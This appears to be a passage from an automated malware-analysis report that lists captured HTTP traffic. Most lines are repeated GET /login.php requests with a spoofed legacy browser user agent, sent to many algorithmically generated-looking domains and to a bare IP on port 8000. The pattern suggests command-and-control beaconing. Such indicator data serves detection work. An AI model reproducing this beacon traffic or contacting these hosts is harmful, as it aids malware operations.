Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupydeq.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupycag.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygynud.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global trafficHTTP traffic detected: GET /dh/147287063_498544.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global trafficHTTP traffic detected: GET /dh/147287063_498544.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qexyhuv.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galynuh.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyciz.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global trafficHTTP traffic detected: GET /login.php?sub1=20241112-0424-16c6-a16f-217434b104d2 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1731345856.5179536
Source: global trafficHTTP traffic detected: GET /login.php?subid1=20241112-0424-16dd-8cfc-e770b1d90a79 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1731345856.5241611
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyhyg.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygyvuj.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyhiz.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comCookie: parking_session=244ca17e-8cf9-4dfe-af64-36b71a041679
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global trafficHTTP traffic detected: GET /dh/147287063_498544.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global trafficHTTP traffic detected: GET /dh/147287063_498544.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.comCookie: __tad=1731345856.5179536
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.comCookie: __tad=1731345856.5241611
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global trafficHTTP traffic detected: GET /login.php?sub1=20241112-0424-3743-a98f-0148015a85a2 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1731345856.5179536
Source: global trafficHTTP traffic detected: GET /login.php?subid1=20241112-0424-3729-8680-cf4058033ce0 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1731345856.5241611; parking_session=a5572c25-6032-467b-b015-10575c4e4ea5
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comCookie: vsid=904vr478891445443024397
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygynud.comCookie: btst=0786bcdb46d67d94d9de9fd3d4d02561|66.23.206.109|1731345850|1731345850|0|1|0; snkz=66.23.206.109
